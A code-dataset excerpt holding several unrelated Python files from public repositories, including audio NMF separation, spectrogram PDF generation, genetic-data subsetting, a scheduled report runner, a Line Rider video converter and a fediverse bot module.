int(str(self.config.hydra.sweep.mode), 8)\n os.chmod(sweep_dir, mode=mode)\n\n # Create jobs but do not start them\n job_params: List[Any] = []\n for idx, overrides in enumerate(job_overrides):\n idx = initial_job_idx + idx\n lst = \" \".join(filter_overrides(overrides))\n log.info(f\"\\t#{idx} : {lst}\")\n job_params.append(\n (\n list(overrides),\n \"hydra.sweep.dir\",\n idx,\n f\"job_id_for_{idx}\",\n Singleton.get_state(),\n )\n )\n\n all_jobs: List[Job] = []\n finished_jobs: Set[Job] = set()\n\n while len(job_params)!=0:\n while sum([j.state in self.ACTIVE_JOB_STATES for j in all_jobs ]) < params[\"max_jobs_in_sweep\"]: \n if len(job_params)!=0:\n queue_info = QueueInfo()\n if queue_info.getTotalJobs() < params[\"max_jobs_in_total\"]:\n if queue_info.getJobsInPartition(params[\"partition\"]) < params[\"max_jobs_in_partition\"]:\n jp = job_params.pop(0)\n all_jobs.append(executor.submit(self, *jp))\n log.info(f\"\\t#{jp[2]} : Scheduled\")\n else:\n break\n else:\n break\n # Dont overrun the scheduler\n time.sleep(1)\n else:\n break\n\n for i in set(all_jobs) - finished_jobs: \n if i.state not in self.ACTIVE_JOB_STATES:\n result = i.result()\n if result.status != JobStatus.COMPLETED:\n sys.stderr.write(f\"Error executing job with overrides: {result.overrides}\" + os.linesep)\n raise result._return_value\n finished_jobs.add(i)\n\n time.sleep(params[\"reschedule_interval\"])\n\n return [j.results()[0] for j in all_jobs]\n\n\n","repo_name":"caplett/hydra_submitit_extension","sub_path":"src/hydra_plugins/hydra_submitit_extension/submitit_launcher.py","file_name":"submitit_launcher.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18791582302","text":"import math\nimport numpy as np\nimport torch\nimport scipy\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport librosa\nimport librosa.display\nimport IPython.display as ipd\nfrom scipy.io import wavfile as wf\nimport torchaudio\n\n# Implement NMF for audio source separation here\n\nclass NMF():\n def __init__(self, device, S = 2, beta = 2, max_iter = 100, epsilon = 1e-10, n_fft = 512, hop_length = 256):\n self.device = device\n self.S = S\n self.beta = beta\n self.max_iter = max_iter\n self.epsilon = epsilon\n self.n_fft = n_fft\n self.hop_length = hop_length\n\n def predict(self, X):\n V, angle = self.process(X)\n K = V.shape[0]\n N = V.shape[1]\n W = np.abs(np.random.normal(loc=0, scale = 2.5, size=(K, self.S)))\n H = np.abs(np.random.normal(loc=0, scale = 2.5, size=(self.S, N)))\n\n for i in range(self.max_iter):\n\n if i % 10 == 0:\n print(i // 10)\n \n H = (np.multiply(H, (np.matmul(W.T, np.multiply(np.matmul(W, H)**(self.beta - 2), V))) / (np.matmul(W.T, np.matmul(W, H)**(self.beta - 1))+ 10e-10)))\n W = (np.multiply(W, (np.matmul(np.multiply(np.matmul(W, H)**(self.beta - 2), V), H.T)) / (np.matmul(np.matmul(W, H)**(self.beta - 1), H.T)+ 10e-10)))\n \n S1 = self.separate_source(0, W, H, angle)\n S2 = self.separate_source(1, W, H, angle)\n\n return S1, S2\n \n def process(self, X):\n X_stft = librosa.stft(X, n_fft = self.n_fft, hop_length = self.hop_length)\n X_stft_magnitude = np.abs(X_stft)\n X_stft_angle = np.angle(X_stft)\n V = X_stft_magnitude + self.epsilon\n\n return V, X_stft_angle\n \n def separate_source(self, index, W, H, angle):\n filtered_spectrograms = np.matmul(W[:,[index]], H[[index],:])\n reconstructed_amp = filtered_spectrograms[index] * np.exp(1j * angle)\n reconstructed_audio = 
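# With beta = 2 the general beta-divergence updates in predict() above lose
# the (WH)**(beta-2) factor (it becomes a matrix of ones) and reduce to the
# classic Lee-Seung multiplicative rules. A compact numpy sketch; the seed,
# iteration count and epsilon guard are illustrative choices:
import numpy as np

def nmf_euclidean(V, S=2, iters=200, eps=1e-10):
    K, N = V.shape
    rng = np.random.default_rng(0)
    W = rng.random((K, S)) + eps
    H = rng.random((S, N)) + eps
    for _ in range(iters):
        H *= (W.T @ V) / (W.T @ W @ H + eps)    # Lee-Seung update for H
        W *= (V @ H.T) / (W @ H @ H.T + eps)    # Lee-Seung update for W
    return W, H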
librosa.istft(reconstructed_amp, n_fft = self.n_fft, hop_length = self.hop_length)\n \n return reconstructed_audio","repo_name":"longdo16/AudioSeparation","sub_path":"AudioSeparation/NMF.py","file_name":"NMF.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33432789622","text":"\"\"\"\nSegment\n-------\n\n\"\"\"\n\nfrom __future__ import annotations\n\nimport fitz\nimport numpy as np\n\nfrom constant import PDF, SETTINGS\nfrom copy import deepcopy\nfrom datatype.dataset import Dataset\nfrom datatype.imaging import create_image\nfrom datatype.settings import Settings\nfrom datatype.spectrogram import create_spectrogram\nfrom io import BytesIO\nfrom itertools import permutations\nfrom PIL import Image, ImageDraw, ImageFont, ImageOps\nfrom typing import TYPE_CHECKING\n\nif TYPE_CHECKING:\n import numpy.typing as npt\n import pandas as pd\n\n from typing_extensions import Any\n\n\ndef create_page(collection: list[Any] | npt.NDArray, text: str) -> Image:\n \"\"\"Create a page with images arranged in a grid.\n\n Args:\n collection: A numpy array containing the images to be put on the page.\n text: The text to be added to the page.\n\n Returns:\n An image representing the page with the images and text.\n\n \"\"\"\n\n padding = y = 150\n length = len(collection)\n\n width, height = np.vectorize(lambda x: x.size)(collection)\n\n width = np.amax(width)\n height = np.amax(height)\n\n height = (height * length) + (padding * length) + y\n\n if width < 500:\n width = 500\n\n grid = Image.new(\n 'L',\n color='white',\n size=(width, height),\n )\n\n for _, image in enumerate(collection):\n x = int(\n (width - image.width) / 2\n )\n\n grid.paste(\n image,\n (x, y)\n )\n\n y = y + image.height + padding\n\n grid = ImageOps.expand(\n grid,\n border=(50, 288),\n fill=(255)\n )\n\n draw = ImageDraw.Draw(grid)\n font = ImageFont.truetype('fonts/times.ttf', 72)\n text_width = draw.textlength(text, font=font)\n\n size = (\n (width + 50 - text_width) // 2,\n 50\n )\n\n draw.text(\n size,\n text,\n (0),\n font=font\n )\n\n return grid\n\n\ndef create_grid(collection: npt.NDArray, text: str) -> Image:\n \"\"\"Create a grid of images.\n\n Args:\n collection: A numpy array containing the images to be put in the grid.\n text: The text to be added to the grid.\n\n Returns:\n An image representing the grid with the images and text.\n\n \"\"\"\n\n column = 5\n padding = 10\n\n row = len(collection) // column\n\n if len(collection) % column:\n row = row + 1\n\n width, height = np.vectorize(lambda x: x.size)(collection)\n maximum_width = np.amax(width) + 10\n maximum_height = np.amax(height) + 10\n\n if maximum_width < 500:\n maximum_width = 500\n\n page_width = maximum_width * column + (padding * column) - padding\n page_height = maximum_height * row + (padding * row) - padding\n\n grid = Image.new(\n 'L',\n color='white',\n size=(page_width, page_height),\n )\n\n x = 0\n y = 0\n\n for index, image in enumerate(collection):\n x_offset = int(\n (maximum_width - image.width) / 2\n )\n\n y_offset = int(\n (maximum_height - image.height) / 2\n )\n\n grid.paste(\n image,\n (x + x_offset, y + y_offset)\n )\n\n x = x + maximum_width + padding\n\n if (index + 1) % column == 0:\n y = y + maximum_height + padding\n x = 0\n\n grid = ImageOps.expand(\n grid,\n border=(20, 100),\n fill=(255)\n )\n\n draw = ImageDraw.Draw(grid)\n font = ImageFont.truetype('fonts/arial.ttf', 32)\n text_width = draw.textlength(text, font=font)\n\n 
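# Resynthesis as in separate_source above: estimate one component's
# magnitude from a rank-1 factor pair, reuse the mixture phase, and invert
# the STFT. A sketch assuming librosa >= 0.10 (where istft accepts n_fft)
# and W, H, angle shaped as produced by process()/predict(); a Wiener-style
# soft mask is a common refinement.
import numpy as np
import librosa

def resynth_component(W, H, i, angle, n_fft=512, hop_length=256):
    mag = W[:, [i]] @ H[[i], :]                 # rank-1 magnitude estimate, (K, N)
    spec = mag * np.exp(1j * angle)             # attach the mixture phase
    return librosa.istft(spec, n_fft=n_fft, hop_length=hop_length)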
size = (\n (page_width - text_width) // 2,\n 0\n )\n\n draw.text(\n size,\n text,\n (0),\n font=font\n )\n\n return grid\n\n\ndef to_string(method: list[str] | tuple[str, ...]) -> str:\n \"\"\"Convert a list of strings to a single string.\n\n Args:\n method: A list of strings.\n\n Returns:\n A string containing the elements of the input list separated by commas.\n\n \"\"\"\n\n return ', '.join(method)\n\n\ndef resize_image(spectrogram: npt.NDArray) -> Image:\n \"\"\"Resize an image.\n\n Args:\n spectrogram: A numpy array representing the spectrogram image.\n\n Returns:\n The resized image.\n\n \"\"\"\n\n image = create_image(spectrogram)\n flip = ImageOps.flip(image)\n\n width, height = flip.size\n\n width = width * 2\n height = height * 2\n\n return flip.resize(\n (width, height),\n resample=Image.Resampling.BOX\n )\n\n\ndef create_document(subset: pd.DataFrame) -> None:\n \"\"\"Create a document with pages containing grids of images.\n\n Args:\n subset: A pandas DataFrame representing a subset of data.\n\n Returns:\n None.\n\n \"\"\"\n\n individal = subset.folder.iloc[0]\n group = subset.groupby('filename', as_index=False)\n\n document = fitz.open()\n toc = []\n\n path = SETTINGS.joinpath('spectrogram.json')\n settings = Settings.from_file(path)\n\n path = SETTINGS.joinpath('dereverberate.json')\n dereverberate = Settings.from_file(path)\n\n print(f\"Processing: {individal}\")\n\n for index, (filename, column) in enumerate(group, 1):\n setting = column.settings.to_numpy()\n\n callback = {\n 'dereverberate': np.frompyfunc(\n lambda x: x.dereverberate(dereverberate),\n 1,\n 0\n ),\n\n 'filter': np.frompyfunc(\n lambda x, y: x.filter(\n y.butter_lowcut,\n y.butter_highcut\n ),\n 2,\n 0\n ),\n\n 'normalize': np.frompyfunc(\n lambda x: x.normalize(),\n 1,\n 0\n ),\n\n # 'reduce': np.frompyfunc(\n # lambda x: x.reduce(),\n # 1,\n # 0\n # )\n }\n\n methods = permutations([*callback], 3)\n\n collection = []\n\n original = column.segment.to_numpy()\n\n for method in methods:\n print(f\"Applying: {method} to {filename}\")\n\n segment = deepcopy(original)\n filtering = to_string(method)\n\n for function in method:\n if function == 'filter':\n callback[function](segment, setting)\n else:\n callback[function](segment)\n\n spectrogram = np.frompyfunc(\n lambda x, y: create_spectrogram(x, y),\n 2,\n 1\n )(segment, settings)\n\n images = np.frompyfunc(\n lambda x: resize_image(x),\n 1,\n 1\n )(spectrogram)\n\n grid = create_grid(images, filtering)\n collection.append(grid)\n\n page = create_page(collection, filename)\n\n buffer = BytesIO()\n page.save(buffer, format='png')\n\n stream = buffer.getvalue()\n\n # Page\n current = document.new_page(\n width=page.width,\n height=page.height\n )\n\n current.insert_image(\n fitz.Rect(\n 20,\n 0,\n page.width,\n page.height\n ),\n stream=stream,\n keep_proportion=True\n )\n\n # Table of Contents\n item = [1, filename, index]\n toc.append(item)\n\n filename = f\"{individal}_segment.pdf\"\n path = PDF.joinpath(filename)\n\n document.set_toc(toc)\n document.save(path, deflate=True)\n document.close()\n\n\ndef main() -> None:\n dataset = Dataset('segment')\n dataframe = dataset.load()\n\n folders = dataframe.folder.unique()\n\n for folder in folders:\n subset = dataframe[dataframe.folder == folder]\n subset = subset.reset_index()\n subset = subset.copy()\n\n create_document(subset)\n\n\nif __name__ == '__main__':\n 
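# The row/column arithmetic in create_grid above generalizes to a small
# contact-sheet helper: paste cells left to right, wrapping every `cols`
# images. A sketch assuming equally sized grayscale PIL images; the names
# and padding default are mine.
from PIL import Image

def contact_sheet(images, cols=5, pad=10):
    w, h = images[0].size
    rows = -(-len(images) // cols)              # ceiling division
    sheet = Image.new('L', (cols * (w + pad) - pad, rows * (h + pad) - pad), color=255)
    for i, im in enumerate(images):
        x, y = (i % cols) * (w + pad), (i // cols) * (h + pad)
        sheet.paste(im, (x, y))                 # fill row-major, top-left first
    return sheet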
main()\n","repo_name":"braycarlson/warbler.py","sub_path":"warbler.py/visualization/pdf/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37628826408","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 25 23:21:59 2019\n\n@author: pijacek\n\"\"\"\nimport subprocess\nimport argparse\nparser = argparse.ArgumentParser(\n description='subset eigen dataset with list of population. You must have convertf in the PATH')\nparser.add_argument('-i', '--input', help=\"prefix of input eigen dataset\")\nparser.add_argument('-o', '--output', help=\"prefix of output (subsetted) eigen dataset\")\nparser.add_argument('-p', '--popfile', help=\"a file containing list of populations, one pop per line\")\n\nargs = parser.parse_args()\n\n# assign variables\n\ninfile = args.input\noutfile = args.output\npopfile = args.popfile\nparfile =\"par_subset_{}_to_{}\".format(infile,outfile)\n\n# create parfile\n\nwith open(parfile,\"w\") as outpar:\n outpar.write(\"genotypename: {}.geno\".format(infile) + \"\\n\")\n outpar.write(\"snpname: {}.snp\".format(infile) + \"\\n\")\n outpar.write(\"indivname: {}.ind\".format(infile) + \"\\n\")\n outpar.write(\"outputformat: EIGENSTRAT\" + \"\\n\")\n outpar.write(\"genotypeoutname: {}.geno\".format(outfile) + \"\\n\")\n outpar.write(\"snpoutname: {}.snp\".format(outfile) + \"\\n\")\n outpar.write(\"indivoutname: {}.ind\".format(outfile) + \"\\n\")\n outpar.write(\"poplistname: {}\".format(popfile))\n\n\n# run convertf\nsubprocess.call(\"convertf -p {0} &> log_{0} &\".format(parfile), shell=True)\n","repo_name":"pijacekch/simple_scripts","sub_path":"subset_eigen.py","file_name":"subset_eigen.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2591094968","text":"from PySide2 import QtWidgets, QtGui, QtCore\nfrom PIL import Image\nimport sys\nimport os\nfrom Presentacion import Presentacion_Main\nfrom Presentacion.ui_interface import *\nimport psutil\nimport threading\nimport schedule\nimport time\nfrom pystray import MenuItem, Icon, Menu\nfrom pystray import MenuItem as item\nfrom BLL import BLL_Request\nfrom BLL import BLL_Fecha\nfrom BLL import BLL_Cliente\nfrom BLL import BLL_Informe\nfrom BLL import BLL_Log\nfrom BLL import BLL_Archivo\nfrom DAL import DAL_Conexion\nfrom tqdm import tqdm\n\n\napp = QtWidgets.QApplication(sys.argv)\n\ndef is_already_running():\n current_process = psutil.Process()\n for process in psutil.process_iter():\n try:\n if process.name() == current_process.name() and process.pid != current_process.pid:\n # Hay otro proceso con el mismo nombre en ejecución\n return True\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return False\n\n\ndef show_error():\n # Crea una ventana de error\n error_window = QtWidgets.QMessageBox()\n error_window.setWindowTitle(\"Error\")\n error_window.setText(\"Ya hay una instancia de la aplicación en ejecución.\")\n error_window.exec_()\n\n#### -------------------------------------------------core--------------------------------###########\n\ndef hacer_informe(cliente, fecha_inicio, fecha_fin, tipo):\n try:\n informe = BLL_Informe.Informe(fecha_inicio, fecha_fin, cliente, tipo)\n informe.hacerInforme()\n BLL_Log.Log().escribir(\"Se realizo el informe con exito \" , cliente.nombre, \"Informar\")\n except Exception as e:\n 
BLL_Log.Log().escribir(\"Hubo un problema para hacer el informe, probablemente no hay archivos CSV del cliente, error : \" + str(e), cliente.nombre, \"Error\")\n\n\ndef doInforme(listaCliente):\n fecha = BLL_Fecha.Fecha()\n fechaFin = BLL_Fecha.Fecha().fechaFin()\n print(fecha.fechaInicio(\"diario\"), fechaFin)\n\n \n with tqdm(total=len(listaCliente), desc=\"Procesando clientes\") as pbar_clientes:\n for cliente in listaCliente:\n try:\n # informes mensuales\n if fecha.ahora().day == 1:\n hacer_informe(cliente, fecha.fechaInicio(\"mensual\"), fechaFin, \"mensual\")\n\n # informes semanales (el tipo de informe es mensual ya que todavia no se definio un template diferente para el informe semanal, por lo tanto se usa el mensual)\n if fecha.ahora().weekday() == 4 and cliente.periodicidad == \"1\":\n hacer_informe(cliente, fecha.fechaInicio(\"semanal\"), fechaFin, \"semanal\")\n\n # informes diarios\n if cliente.periodicidad == \"0\":\n hacer_informe(cliente, fecha.fechaInicio(\"diario\"), fechaFin, \"diario\")\n\n BLL_Log.Log().escribir(\"Se generó el informe correctamente\", cliente.nombre, \"Informar\")\n except Exception as e:\n BLL_Log.Log().escribir(\"Hubo algun problema en la creacion de informe \" + str(e), cliente.nombre, \"Error\")\n\n # Actualizar la barra de progreso para el procesamiento de los clientes\n pbar_clientes.update(1)\n\n\ndef doRequest(listaCliente): \n fecha = BLL_Fecha.Fecha()\n semanal = False\n mensual = False\n request = BLL_Request.Request()\n print(\"entre a request\")\n with tqdm(total=len(listaCliente)) as pbar:\n for cliente in listaCliente:\n print(cliente)\n \n try:\n if fecha.ahora().day == 1:\n #lunes = 0, domingo = 6\n if fecha.ahora().weekday() == 4:\n #SE HACEN TODAS LAS REQUESTS\n semanal = True\n mensual = True\n print(\"Hoy es mensual y semanal\")\n else: \n #SE HACEN LAS REQUESTS DIARIAS Y MENSUALES\n mensual = True\n print(\"Hoy es mensual\")\n elif fecha.ahora().weekday() == 4:\n #SE HACEN LAS REQUESTS DIARIAS Y SEMANALES\n semanal = True\n print(\"Hoy es semanal\")\n print(\"Hoy es diario\")\n # se hacen las request correspondientes\n request.ejecutarMapperLectura(fecha, semanal, mensual, cliente)\n BLL_Log.Log().escribir(\"Se realizaron las request de manera correcta \", cliente.nombre, \"Informar\")\n pbar.update(1)\n except Exception as e:\n BLL_Log.Log().escribir(\"Hubo algun problema en las request \" + str(e), cliente.nombre, \"Error\")\n\n\n\ndef doRequestInforme():\n cliente = BLL_Cliente.Cliente()\n listaCliente = cliente.crearListaDB()\n\n # Crear un hilo para ejecutar la función doRequest\n request_thread = threading.Thread(target=doRequest, args=(listaCliente,))\n request_thread.start()\n\n # Crear un hilo para ejecutar la función doInforme\n informe_thread = threading.Thread(target=doInforme, args=(listaCliente,))\n informe_thread.start()\n\n # Esperar a que ambos hilos finalicen\n request_thread.join()\n informe_thread.join()\n\n### -----------------------------------------------------------------------------------##################\n\ndef cleanup():\n # elimina los recursos utilizados por la aplicación\n icon.stop()\n root.deleteLater()\n app.quit()\n\ndef on_open(icon, item):\n root.show()\n root.activateWindow()\n\ndef on_exit(icon, item):\n cleanup()\n\ndef read_scheduleconf():\n with open(os.getcwd() + '//DATA//CONFIG//scheduleconf.txt', 'r') as f:\n scheduleconf = f.read().strip()\n return scheduleconf\n\ndef run_schedule():\n scheduleconf = read_scheduleconf()\n while True:\n current_scheduleconf = read_scheduleconf()\n if 
current_scheduleconf != scheduleconf:\n # El horario ha sido modificado, actualiza el schedule\n scheduleconf = current_scheduleconf\n schedule.clear()\n schedule.every().day.at(scheduleconf).do(doRequestInforme)\n print(\"Schedule programado para ejecutarse a las\", scheduleconf)\n\n schedule.run_pending()\n time.sleep(1)\n\ndef monitor_scheduleconf():\n file_path = os.getcwd() + '//DATA//CONFIG//scheduleconf.txt'\n last_modified = os.path.getmtime(file_path)\n\n while True:\n time.sleep(1)\n if os.path.getmtime(file_path) > last_modified:\n # El archivo ha sido modificado, reinicia el proceso del schedule\n last_modified = os.path.getmtime(file_path)\n schedule_thread = threading.Thread(target=run_schedule, daemon=True)\n schedule_thread.start()\n'''\ndef run_schedule():\n with open(os.getcwd() + '//DATA//CONFIG//scheduleconf.txt', 'r') as f:\n scheduleconf = f.read().strip()\n \n schedule.every().day.at(scheduleconf).do(doRequestInforme)\n\n print(\"Schedule programado para ejecutarse a las\", scheduleconf)\n \n while True:\n schedule.run_pending()\n time.sleep(1)\n'''\n\ndef main():\n log = BLL_Log.Log()\n print(\"entre a main\")\n #conexion = DAL_Conexion.Conexion().asignarAtributos(**)\n conexion = DAL_Conexion.Conexion()\n if(os.path.exists(os.getcwd() + \"//DATA//CONFIG//Conexion.json\")):\n conexion.leerArchivo()\n if is_already_running():\n print(\"hay una instancia en ejecucion\")\n show_error()\n else:\n # Crea un subproceso para ejecutar el schedule en segundo plano\n schedule_thread = threading.Thread(target=run_schedule, daemon=True)\n schedule_thread.start()\n\n monitor_thread = threading.Thread(target=monitor_scheduleconf, daemon=True)\n monitor_thread.start()\n\n # crea la ventana principal\n global root\n root = Presentacion_Main.App()\n root.show()\n\n # Agrega el ícono y el menú de Pystray\n image = Image.open(os.getcwd() + \"//Presentacion//img//icono.png\") \n menu = (\n item('Abrir', on_open, default=True),\n item('Cerrar', on_exit),\n )\n\n global icon \n icon = Icon(\"Soccrate\", image, \"Soccrate 2.0\", menu)\n icon.run()\n\n cleanup()\n #sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n main()","repo_name":"MusicLab/Automatization","sub_path":"soccrate2.0-test.pyw","file_name":"soccrate2.0-test.pyw","file_ext":"pyw","file_size_in_byte":8293,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33443054759","text":"# quota_management_service.py\r\n\r\nclass QuotaManagementService:\r\n def __init__(self, approval_service):\r\n self.approval_service = approval_service\r\n\r\n def allocate_quota(self, user_id, quota_type, amount):\r\n # Simulate quota allocation\r\n print(f\"Allocating {quota_type} quota: {amount} for User ID: {user_id}\")\r\n return {'status': 'success'}\r\n\r\n def update_quota(self, user_id, quota_type, new_amount):\r\n # Simulate quota update\r\n print(f\"Updating {quota_type} quota: {new_amount} for User ID: {user_id}\")\r\n return {'status': 'success'}\r\n\r\n def enforce_quota(self, user_id, quota_type, requested_amount):\r\n # Simulate quota enforcement\r\n available_quota = 10 # Assume available quota is 10 for this demo\r\n if requested_amount <= available_quota:\r\n print(f\"Quota for {quota_type} request approved for User ID: {user_id}\")\r\n return {'status': 'approved'}\r\n else:\r\n print(f\"Quota for {quota_type} request denied for User ID: {user_id}\")\r\n # Request approval for exceeding quota\r\n approval_status = self.approval_service.approve_request(user_id, 
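# run_schedule and monitor_scheduleconf above start a fresh thread each time
# scheduleconf.txt changes, leaving the superseded loops alive. One loop
# that watches the file's mtime and rebuilds the timetable avoids that. A
# sketch assuming the `schedule` package and an HH:MM string in the file:
import os
import time
import schedule

def run_schedule_single(path, job):
    last_mtime = None
    while True:
        mtime = os.path.getmtime(path)
        if mtime != last_mtime:                 # config file changed on disk
            last_mtime = mtime
            with open(path) as f:
                at = f.read().strip()
            schedule.clear()                    # drop the old timetable
            schedule.every().day.at(at).do(job) # install the new time
        schedule.run_pending()
        time.sleep(1)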
'quota_exceeded', 'Quota exceeded for temporary environments.')\r\n if approval_status['status'] == 'approved':\r\n print(\"Approval received. Overriding quota limit.\")\r\n return {'status': 'approved'}\r\n else:\r\n return {'status': 'denied', 'reason': 'Quota exceeded'}\r\n","repo_name":"RexAgarwal/Cloud_Provisioning_assistant_demo","sub_path":"quota_management_service.py","file_name":"quota_management_service.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10678827379","text":"import random, math, os, sys,json\nfrom track import *\nfrom line import *\nimport cv2, os\nfrom PIL import Image\nMAXRGBFORBLACK = 40\n# VIDEOS ARE SOMETIMES ROTATED WRONG/FLIPPED - NEED TO FIX\nprint(\"Welcome to LRAnimate!\")\n#print(\"WARNING! Ideally only input .mov files as .mp4 files end up with the wrong orientation and mirrored!\")\nfilename = input(\"Please type the name of your video file: \")\nwidth_scaling = int(input(\"please enter the pixel width your would like x to be (recommended 100): \"))\ndistance = int(input(\"Please enter distance between frames (recomend 1000 but up to you): \"))\n\ndef getLines(img,width,height):\n\t\tstart = 0\n\t\tend = 0\n\t\tret = []\n\t\tls = False\n\t\tfor x in range(width):\n\t\t\tif ls == True:\n\t\t\t\tret.append((start,end))\n\t\t\t\tls = False\n\t\t\tfor y in range(height):\n\t\t\t\tif img.getpixel((x,y))[0] < MAXRGBFORBLACK and img.getpixel((x,y))[1] < MAXRGBFORBLACK and img.getpixel((x,y))[2] < MAXRGBFORBLACK:\n\t\t\t\t\tif ls == False:\n\t\t\t\t\t\tls = True\n\t\t\t\t\t\tstart = x,y\n\t\t\t\t\t\tend = x,y\n\t\t\t\t\telse:\n\t\t\t\t\t\tend = x,y\n\t\t\t\t\t\t\n\t\t\t\telif img.getpixel((x,y))[0] > MAXRGBFORBLACK and img.getpixel((x,y))[1] > MAXRGBFORBLACK and img.getpixel((x,y))[2] > MAXRGBFORBLACK and ls == True:\n\t\t\t\t\tret.append((start,end))\n\t\t\t\t\tls = False\n\n\t\treturn ret\n\n\n\n\n\n\n\nframe = \"\"\ntrack = Track()\nc = 0\nPIXELWIDTH = 1\nOFFSET = 0\nvidcap = cv2.VideoCapture(filename)\nsuccess,img = vidcap.read()\n#print((os.path(filename)))\n\nframe = img\n\t\nframe = Image.fromarray(frame)\nif width_scaling == 0:\n\twidth_scaling = frame.width\nwidth = frame.width\nSCALE = width_scaling/width\nwidth_s = width*SCALE\nheight = frame.height\nheight_s = height*SCALE\n\n\n\ncount = 0\nwhile success:\n\t#cv2.imwrite(\"%d.jpg\" % count, image)\t # save frame as JPEG file\t \n\tframe = img\n\t\n\tframe = Image.fromarray(frame)\n\t#print(frame.getpixel((1,2)))\n\n\twidth = frame.width\n\tSCALE = width_scaling/width\n\twidth_s = width*SCALE\n\theight = frame.height\n\theight_s = height*SCALE\n\t#print(width,height)\n\tPIXELWIDTH = SCALE/width\n\t#print(width, height)\n\t#l = getLines(frame, width, height)\n\t\n\tif count == 0:\n\t\tOFFSET += width_s+distance\n\tlines = getLines(frame,width,height)\n#\tfor x,row in enumerate(frame):\n#\t\tfor y,pixel in enumerate(row):\n#\t\t\tif pixel[0] < MAXRGBFORBLACK and pixel[1] < MAXRGBFORBLACK and pixel[2] < MAXRGBFORBLACK:\n#\t\t\t\t#print(x,y)\n#\t\t\t\tx1 = x*SCALE + OFFSET - PIXELWIDTH/2\n#\t\t\t\ty1 = y*SCALE + PIXELWIDTH/2\n#\t\t\t\tx2 = x*SCALE + OFFSET - PIXELWIDTH/2\n#\t\t\t\ty2 = y*SCALE - PIXELWIDTH/2\n#\t\t\t\t#track.addLine(Line(2,c,x1,y1,x2,y2,False,False,False))\n\t\n\t#track.addLine(Line(2,c,x1,y1,x2,y2,False,False,False))\n\tfor n,ln in enumerate(lines):\n\t\tx1 = ln[0][0]*SCALE + OFFSET\n\t\ty1 = ln[0][1]*SCALE\n\t\tx2 = ln[1][0]*SCALE + OFFSET\n\t\ty2 = 
ln[1][1]*SCALE\n\t\ttrack.addLine(Line(2,n,x1,y1,x2,y2))\n\t\tc += 1\n\tc += 1\n\tOFFSET += width_s+distance\n\tprint(f\"Frame {count} Total Lines: {c}\")\n\n\n\n\n\tsuccess,img = vidcap.read()\n\t#print('Read a new frame: ', success)\n\tcount += 1\n\n# pixel\n# 1,2,3 = red,green,blue\n#print(frames[0][20][30])\n\n\n\n\ntrack.addLine(Line(0,c, -50, height_s, 0, height_s, False,False,False))\ntrack.addLine(Line(0,c+1, 0, height_s, OFFSET, height_s, False,False,False))\n#track.addLine(Line(1,c+2, -50, height, 10, height, False,False,False,2))\n\ntrack.data[\"startPosition\"] = {\"x\":-50,\"y\":height-5}\ntrack.data[\"riders\"][0][\"startPosition\"] = {\"x\":-50,\"y\":height_s-5}\ntrack.data[\"riders\"][0][\"startVelocity\"] = {\"x\":width_s+distance,\"y\":0}\ntrack.saveTrack(filename)\n\nprint(f\"Track Saved as {filename}.json\")","repo_name":"Conqu3red/LRAnimate","sub_path":"Animate.py","file_name":"Animate.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11127132178","text":"#--depends-on rest_api\n\nimport urllib.parse\nfrom src import IRCBot, ModuleManager, utils\nfrom . import ap_actor, ap_security, ap_server, ap_utils\n\ndef _format_username(username, instance):\n return \"@%s@%s\" % (username, instance)\ndef _setting_parse(s):\n username, instance = ap_utils.split_username(s)\n if username and instance:\n return _format_username(username, instance)\n return None\n\n@utils.export(\"botset\", utils.FunctionSetting(_setting_parse,\n \"fediverse-server\", \"The bot's local fediverse server username\",\n example=\"@bot@bitbot.dev\"))\n@utils.export(\"set\", utils.FunctionSetting(_setting_parse, \"fediverse\",\n help=\"Set your fediverse account\", example=\"@gargron@mastodon.social\"))\nclass Module(ModuleManager.BaseModule):\n _name = \"Fedi\"\n\n def on_load(self):\n server_username = self.bot.get_setting(\"fediverse-server\", None)\n if server_username:\n if not \"tls-key\" in self.bot.config:\n raise ValueError(\"`tls-key` not provided in bot config\")\n if not \"tls-certificate\" in self.bot.config:\n raise ValueError(\"`tls-certificate` not provided in bot config\")\n if not ap_security.has_crypto:\n raise ValueError(\"cyprography library is not installed \"\n \"(https://pypi.org/project/cryptography/)\")\n\n server_username, instance = ap_utils.split_username(server_username)\n self.server = ap_server.Server(self.bot, self.exports,\n server_username, instance)\n\n self.events.on(\"api.get.ap-webfinger\").hook(\n self.server.ap_webfinger, authenticated=False)\n self.events.on(\"api.get.ap-user\").hook(\n self.server.ap_user, authenticated=False)\n self.events.on(\"api.post.ap-inbox\").hook(\n self.server.ap_inbox, authenticated=False)\n self.events.on(\"api.get.ap-outbox\").hook(\n self.server.ap_outbox, authenticated=False)\n def unload(self):\n if not self.server == None:\n self.server.unload()\n\n @utils.hook(\"received.command.fediverse\")\n @utils.hook(\"received.command.fedi\", alias_of=\"fediverse\")\n @utils.kwarg(\"help\", \"Get someone's latest toot\")\n @utils.kwarg(\"usage\", \"@@\")\n def fedi(self, event):\n account = None\n if not event[\"args\"]:\n account = event[\"user\"].get_setting(\"fediverse\", None)\n elif not \"@\" in event[\"args\"]:\n target = event[\"args_split\"][0]\n if event[\"server\"].has_user_id(target):\n target_user = event[\"server\"].get_user(target)\n account = target_user.get_setting(\"fediverse\", None)\n else:\n account = 